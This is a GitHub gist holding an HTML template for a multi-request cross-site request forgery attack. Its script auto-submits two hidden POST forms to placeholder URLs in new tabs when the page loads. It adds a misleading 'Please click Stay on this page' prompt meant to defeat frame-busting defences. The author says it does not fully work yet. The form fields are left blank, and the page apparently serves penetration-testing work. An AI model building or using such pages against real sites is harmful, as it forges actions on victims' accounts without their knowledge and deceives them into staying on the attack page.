Created
December 10, 2019 09:22
-
-
Save hoodoer/eac4a3bd67f5b059ea90886cf74e32ea to your computer and use it in GitHub Desktop.
New tab based multi-request CSRF. Opens requests in a new tab if iframes are blocked. Haven't gotten this working quite yet though..
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <script language="javascript"> | |
| window.onload = function() { | |
| document.getElementById("csrfForm1").submit(); | |
| // to make 2nd form wait for 1st, put the following in a function and use as a callback for a new timer | |
| document.getElementById("csrfForm2").submit(); | |
| } | |
| // defeat frame busters | |
| window.onbeforeunload = function() { | |
| return "Please click 'Stay on this page' to allow it to finish loading."; | |
| } | |
| </script> | |
| </head> | |
| <body> | |
| <form id="csrfForm1" action="https://SOMEURL.com" method="POST" target="_blank"> | |
| <input type="hidden" name="" value="" /> | |
| <input type="hidden" name="" value="" /> | |
| </form> | |
| <form id="csrfForm2" action="https://SOMEOTHERURL.com" method="POST" target="_blank"> | |
| <input type="hidden" name="" value="" /> | |
| <input type="hidden" name="" value="" /> | |
| </form> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment